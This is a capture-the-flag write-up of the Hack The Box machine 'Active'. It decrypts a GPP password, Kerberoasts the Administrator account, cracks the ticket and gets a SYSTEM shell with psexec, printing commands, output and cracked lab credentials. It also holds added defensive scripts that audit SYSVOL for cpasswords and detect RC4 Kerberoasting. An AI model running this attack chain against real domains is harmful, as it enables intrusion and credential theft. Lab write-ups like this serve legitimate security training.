Active

Skills

  • SMB Enumeration
  • Abusing GPP Passwords
  • Decrypting GPP Passwords - gpp-decrypt
  • Kerberoasting Attack (GetUserSPNs.py) [Privilege Escalation]

Certifications

  • OSCP
  • OSEP
  • eCPPTv3

Description

Active is an easy Windows machine. We enumerate the SMB service and find a username and a password in Groups.xml, which we decrypt. We then carry out a Kerberoasting attack and obtain the TGS (Ticket Granting Service) ticket of the Administrator user, crack it, and finally gain access to the victim machine with psexec.


Reconnaissance

We check that the machine is up and infer its operating system from the TTL: Windows hosts usually reply with a TTL of 128, and here an intermediate hop decrements it by one, giving 127.

# ping 10.129.52.233 
PING 10.129.52.233 (10.129.52.233) 56(84) bytes of data.
64 bytes from 10.129.52.233: icmp_seq=1 ttl=127 time=216 ms
64 bytes from 10.129.52.233: icmp_seq=2 ttl=127 time=161 ms
64 bytes from 10.129.52.233: icmp_seq=3 ttl=127 time=121 ms
^C
--- 10.129.52.233 ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 2003ms
rtt min/avg/max/mdev = 121.153/166.270/216.454/39.071 ms

Nmap

We scan all TCP ports with nmap to find the open ones.

# sudo nmap -p- --open --min-rate 5000 -sS -Pn -n -v 10.129.52.233 -oG openPorts
[sudo] password for justice-reaper: 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-14 15:08 CEST
Initiating SYN Stealth Scan at 15:08
Scanning 10.129.52.233 [65535 ports]
Discovered open port 445/tcp on 10.129.52.233
Discovered open port 135/tcp on 10.129.52.233
Discovered open port 139/tcp on 10.129.52.233
Discovered open port 53/tcp on 10.129.52.233
Discovered open port 49153/tcp on 10.129.52.233
Discovered open port 49155/tcp on 10.129.52.233
Discovered open port 49168/tcp on 10.129.52.233
Discovered open port 47001/tcp on 10.129.52.233
Discovered open port 49154/tcp on 10.129.52.233
Discovered open port 5722/tcp on 10.129.52.233
Discovered open port 49165/tcp on 10.129.52.233
Discovered open port 3269/tcp on 10.129.52.233
Discovered open port 49152/tcp on 10.129.52.233
Discovered open port 49157/tcp on 10.129.52.233
Discovered open port 3268/tcp on 10.129.52.233
Discovered open port 636/tcp on 10.129.52.233
Discovered open port 464/tcp on 10.129.52.233
Discovered open port 49166/tcp on 10.129.52.233
Discovered open port 9389/tcp on 10.129.52.233
Discovered open port 88/tcp on 10.129.52.233
Discovered open port 49158/tcp on 10.129.52.233
Discovered open port 593/tcp on 10.129.52.233
Discovered open port 389/tcp on 10.129.52.233
Completed SYN Stealth Scan at 15:08, 18.89s elapsed (65535 total ports)
Nmap scan report for 10.129.52.233
Host is up (0.19s latency).
Not shown: 64550 closed tcp ports (reset), 962 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT      STATE SERVICE
53/tcp    open  domain
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5722/tcp  open  msdfsr
9389/tcp  open  adws
47001/tcp open  winrm
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49155/tcp open  unknown
49157/tcp open  unknown
49158/tcp open  unknown
49165/tcp open  unknown
49166/tcp open  unknown
49168/tcp open  unknown

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 18.98 seconds
           Raw packets sent: 92271 (4.060MB) | Rcvd: 68766 (2.751MB)

We now run service detection and version identification against the open ports found.

# nmap -sCV -p 53,88,135,139,389,445,464,593,636,3268,3269,5722,9389,47001,49152,49153,49154,49155,49157,49158,49165,49166,49168 10.129.52.233 -oN services
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-14 15:09 CEST
Nmap scan report for 10.129.52.233
Host is up (0.11s latency).

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid: 
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-08-14 13:09:36Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5722/tcp  open  msrpc         Microsoft Windows RPC
9389/tcp  open  mc-nmf        .NET Message Framing
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49152/tcp open  msrpc         Microsoft Windows RPC
49153/tcp open  msrpc         Microsoft Windows RPC
49154/tcp open  msrpc         Microsoft Windows RPC
49155/tcp open  msrpc         Microsoft Windows RPC
49157/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49158/tcp open  msrpc         Microsoft Windows RPC
49165/tcp open  msrpc         Microsoft Windows RPC
49166/tcp open  msrpc         Microsoft Windows RPC
49168/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   2:1:0: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2024-08-14T13:10:35
|_  start_date: 2024-08-14T12:59:21

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 76.49 seconds

SMB Enumeration

We list the shares with crackmapexec using a null session (empty username and password); the Replication share is readable anonymously.

# crackmapexec smb 10.129.52.233 -u '' -p '' --shares 
SMB         10.129.52.233   445    DC               [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:False)
SMB         10.129.52.233   445    DC               [+] active.htb\: 
SMB         10.129.52.233   445    DC               [+] Enumerated shares
SMB         10.129.52.233   445    DC               Share           Permissions     Remark
SMB         10.129.52.233   445    DC               -----           -----------     ------
SMB         10.129.52.233   445    DC               ADMIN$                          Remote Admin
SMB         10.129.52.233   445    DC               C$                              Default share
SMB         10.129.52.233   445    DC               IPC$                            Remote IPC
SMB         10.129.52.233   445    DC               NETLOGON                        Logon server share 
SMB         10.129.52.233   445    DC               Replication     READ            
SMB         10.129.52.233   445    DC               SYSVOL                          Logon server share 
SMB         10.129.52.233   445    DC               Users                  

We connect with smbclient and download the Groups.xml file from the Replication share, whose layout mirrors the Group Policy Preferences folders of SYSVOL.

# smbclient --no-pass //10.129.52.233/Replication 
smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\> get Groups.xml 
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml of size 533 as Groups.xml (1.7 KiloBytes/sec) (average 1.7 KiloBytes/sec)

The file contains a username and an encrypted password (the cpassword attribute).

<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>

We decrypt the password and obtain the credentials SVC_TGS:GPPstillStandingStrong2k18. gpp-decrypt works because the AES key that Group Policy Preferences uses for cpassword is public, so any cpassword left on a share is effectively plaintext.

# gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
GPPstillStandingStrong2k18

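As an added defender-side example (this code is not from the original post), the following Python audits a SYSVOL copy for the same weakness: it walks the tree, parses every GPP XML file that can carry a cpassword attribute, and reports each one together with the account it belongs to and the ciphertext length once the stripped base64 padding is restored. The sample Groups.xml is constructed inline from the one downloaded above; the directory layout in demo() and the account attribute names for the other GPP file types are assumptions.

```python
import base64
import os
import tempfile
import xml.etree.ElementTree as ET
# GPP files that can carry a cpassword attribute (the MS14-025 family)
GPP_FILES = {"Groups.xml", "Services.xml", "ScheduledTasks.xml",
             "DataSources.xml", "Drives.xml", "Printers.xml"}
ACCOUNT_ATTRS = ("userName", "accountName", "runAs", "username")  # who the password is for
# Constructed sample in the same shape as the Groups.xml found on the share
SAMPLE_GROUPS_XML = (
    '<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">'
    '<User name="active.htb\\SVC_TGS" changed="2018-07-18 20:46:06">'
    '<Properties action="U" userName="active.htb\\SVC_TGS" cpassword="edBSHOwhZLTjt/'
    'QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ"/>'
    "</User></Groups>"
)
def pad_cpassword(cpassword):
    """GPP strips the base64 '=' padding; restore it so b64decode accepts it."""
    return cpassword + "=" * (-len(cpassword) % 4)

def find_cpasswords(xml_text, path="<inline>"):
    """One finding per preference item whose <Properties> carries a cpassword."""
    findings = []
    for item in ET.fromstring(xml_text):  # <User>, <Service>, <Task>, ...
        props = item.find("Properties")
        cpw = props.get("cpassword") if props is not None else None
        if not cpw:
            continue
        account = next((props.get(a) for a in ACCOUNT_ATTRS if props.get(a)), "")
        findings.append({"file": path, "item": item.tag, "account": account,
                         "ciphertext_len": len(base64.b64decode(pad_cpassword(cpw)))})
    return findings

def scan_sysvol(root_dir):
    """Walk a SYSVOL tree and collect findings from every GPP file in it."""
    findings = []
    for dirpath, _dirs, files in os.walk(root_dir):
        for name in files:
            if name in GPP_FILES:
                full = os.path.join(dirpath, name)
                with open(full, encoding="utf-8") as fh:
                    findings.extend(find_cpasswords(fh.read(), full))
    return findings

def demo():  # write the sample to a temporary SYSVOL-like tree and scan it
    with tempfile.TemporaryDirectory() as tmp:
        gpp_dir = os.path.join(tmp, "Policies", "GUID", "MACHINE", "Preferences", "Groups")
        os.makedirs(gpp_dir)
        with open(os.path.join(gpp_dir, "Groups.xml"), "w", encoding="utf-8") as fh:
            fh.write(SAMPLE_GROUPS_XML)
        return scan_sysvol(tmp)
```

Any hit is a finding to remediate: the credential must be rotated and the preference item deleted, since MS14-025 only stops new cpasswords from being written and does not remove existing ones.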
Kerberos Enumeration

We synchronize our clock with the DC's; this is needed for several attacks against the Kerberos service, since the KDC rejects requests whose timestamps are too far out of sync.

# sudo ntpdate 10.129.52.233
2024-08-15 01:45:52.666170 (+0200) +0.140977 +/- 0.093624 10.129.52.233 s1 no-leap

We check whether any user account has an SPN set (and is therefore Kerberoastable) and find one: Administrator.

# impacket-GetUserSPNs 'active.htb/SVC_TGS:GPPstillStandingStrong2k18' -dc-ip 10.129.52.233
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

ServicePrincipalName  Name           MemberOf                                                  PasswordLastSet             LastLogon                   Delegation 
--------------------  -------------  --------------------------------------------------------  --------------------------  --------------------------  ----------
active/CIFS:445       Administrator  CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb  2018-07-18 21:06:40.351723  2024-08-14 15:00:28.281354 

Kerberos Exploitation

We carry out the Kerberoasting attack and obtain the TGS (Ticket Granting Service) ticket of the Administrator user, issued with RC4 (etype 23), which is what makes it crackable offline.

# impacket-GetUserSPNs 'active.htb/SVC_TGS:GPPstillStandingStrong2k18' -dc-ip 10.129.52.233 -request
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

ServicePrincipalName  Name           MemberOf                                                  PasswordLastSet             LastLogon                   Delegation 
--------------------  -------------  --------------------------------------------------------  --------------------------  --------------------------  ----------
active/CIFS:445       Administrator  CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb  2018-07-18 21:06:40.351723  2024-08-14 15:00:28.281354             

[-] CCache file is not found. Skipping...
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$fae2224c28ab18c817b989c01a5b6a0a$...

We save the TGS hash to a file and crack it with john.

# john -w:rockyou.txt hash
Created directory: /home/justice-reaper/.john
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Ticketmaster1968 (?)     
1g 0:00:00:53 DONE (2024-08-15 02:03) 0.01871g/s 197285p/s 197285c/s 197285C/s Tiffani1432..Thehunter22
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 

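A detection-side example, added here and not part of the original post: the rule most SOCs run for Kerberoasting is to watch Security event 4769 for RC4 (TicketEncryptionType 0x17) service tickets issued for user accounts that hold an SPN, which is exactly the etype 23 hash john loaded above. The events below are constructed; apart from SVC_TGS and Administrator, the account and service names are invented, and a real deployment would parse the event XML instead of dicts.

```python
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = 0x17               # the etype behind $krb5tgs$23$ hashes; AES is 0x11/0x12
WINDOW = timedelta(minutes=5)  # burst window for counting distinct SPN accounts

def ev(time, requester, service, etype, status="0x0", ip="10.10.10.5"):
    """Build a constructed Security event 4769 record with the fields the rule uses."""
    return {"time": time, "TargetUserName": requester, "ServiceName": service,
            "TicketEncryptionType": etype, "Status": status, "IpAddress": ip}

# Constructed sample log (not real telemetry); names other than the post's are invented
EVENTS = [
    ev("2024-08-14T15:00:10", "alice@ACTIVE.HTB", "DC$", "0x12"),           # AES, machine account: normal
    ev("2024-08-14T15:01:02", "SVC_TGS@ACTIVE.HTB", "Administrator", "0x17", ip="10.10.14.7"),  # as in the post
    ev("2024-08-14T15:01:05", "alice@ACTIVE.HTB", "krbtgt", "0x17"),        # TGT renewal: excluded
    ev("2024-08-14T15:20:00", "jdoe@ACTIVE.HTB", "sqlsvc", "0x17", ip="10.10.14.9"),
    ev("2024-08-14T15:20:01", "jdoe@ACTIVE.HTB", "websvc", "0x17", ip="10.10.14.9"),
    ev("2024-08-14T15:20:03", "jdoe@ACTIVE.HTB", "backupsvc", "0x17", ip="10.10.14.9"),
    ev("2024-08-14T15:20:04", "jdoe@ACTIVE.HTB", "backupsvc", "0x17", status="0x1b"),  # failed: excluded
]

def is_user_spn_account(service_name):
    """Kerberoasting targets user accounts with SPNs, not machine accounts or krbtgt."""
    name = service_name.split("@")[0]
    return not name.endswith("$") and name.lower() != "krbtgt"

def detect_kerberoast(events, window=WINDOW):
    """One alert per requester that obtained RC4 service tickets for user-account SPNs."""
    by_requester = defaultdict(list)
    for e in events:
        if int(e["Status"], 16) != 0 or int(e["TicketEncryptionType"], 16) != RC4_HMAC:
            continue
        if is_user_spn_account(e["ServiceName"]):
            by_requester[e["TargetUserName"]].append(e)
    alerts = []
    for requester, evs in by_requester.items():
        evs.sort(key=lambda e: e["time"])
        times = [datetime.fromisoformat(e["time"]) for e in evs]
        best = 0  # most distinct SPN accounts requested inside any one window
        for i, start in enumerate(times):
            in_win = {evs[j]["ServiceName"] for j in range(i, len(evs)) if times[j] - start <= window}
            best = max(best, len(in_win))
        alerts.append({"requester": requester, "source_ip": evs[0]["IpAddress"],
                       "services": sorted({e["ServiceName"] for e in evs}),
                       "max_distinct_in_window": best,
                       "severity": "high" if best >= 3 else "medium"})
    return alerts
```

A single RC4 request for one SPN account (the case in this post) only rates medium on its own, so the rule pairs with hardening: enforce AES-only on SPN accounts, give them long random passwords or move them to gMSAs, and keep privileged accounts such as Administrator free of SPNs.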
We validate the credentials over SMB.

# crackmapexec smb 10.129.52.233 -u 'Administrator' -p 'Ticketmaster1968'          
SMB         10.129.52.233   445    DC               [*] Windows 7 / Server 2008 R2 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:False)
SMB         10.129.52.233   445    DC               [+] active.htb\Administrator:Ticketmaster1968 (Pwn3d!)

Intrusion

We connect to the victim machine as the Administrator user.

# impacket-psexec active.htb/Administrator:Ticketmaster1968@10.129.52.233            
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Requesting shares on 10.129.52.233.....
[*] Found writable share ADMIN$
[*] Uploading file ZyMSzmHt.exe
[*] Opening SVCManager on 10.129.52.233.....
[*] Creating service stiT on 10.129.52.233.....
[*] Starting service stiT.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32> whoami
nt authority\system

When we list a directory, the output comes out like this:

# impacket-psexec active.htb/Administrator:Ticketmaster1968@10.129.52.233          
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Requesting shares on 10.129.52.233.....
[*] Found writable share ADMIN$
[*] Uploading file dABTtDoh.exe
[*] Opening SVCManager on 10.129.52.233.....
[*] Creating service RfNM on 10.129.52.233.....
[*] Starting service RfNM.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32> cd \

C:\> dir
 Volume in drive C has no label.
 Volume Serial Number is 15BB-D59C

 Directory of C:\

[-] Decoding error detected, consider running chcp.com at the target,
map the result with https://docs.python.org/3/library/codecs.html#standard-encodings
and then execute smbexec.py again with -codec and the corresponding codec
14/07/2009  06:20 ��    <DIR>          PerfLogs

To fix it, we run this command on the victim machine to find out which code page the console uses:

C:\> chcp
Active code page: 737

We must pass this codec (cp737) to psexec when connecting in order to display the output correctly:

# impacket-psexec -codec cp737 active.htb/Administrator:Ticketmaster1968@10.129.52.233  
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Requesting shares on 10.129.52.233.....
[*] Found writable share ADMIN$
[*] Uploading file abYWgHub.exe
[*] Opening SVCManager on 10.129.52.233.....
[*] Creating service PSXu on 10.129.52.233.....
[*] Starting service PSXu.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32> cd \

C:\> dir
 Volume in drive C has no label.
 Volume Serial Number is 15BB-D59C

 Directory of C:\

14/07/2009  06:20 πμ    <DIR>          PerfLogs
12/01/2022  04:11 μμ    <DIR>          Program Files
21/01/2021  07:49 μμ    <DIR>          Program Files (x86)
21/07/2018  05:39 μμ    <DIR>          Users
15/08/2024  03:25 πμ    <DIR>          Windows
               0 File(s)              0 bytes
               5 Dir(s)   1.137.012.736 bytes free

This post is licensed under CC BY 4.0 by the author.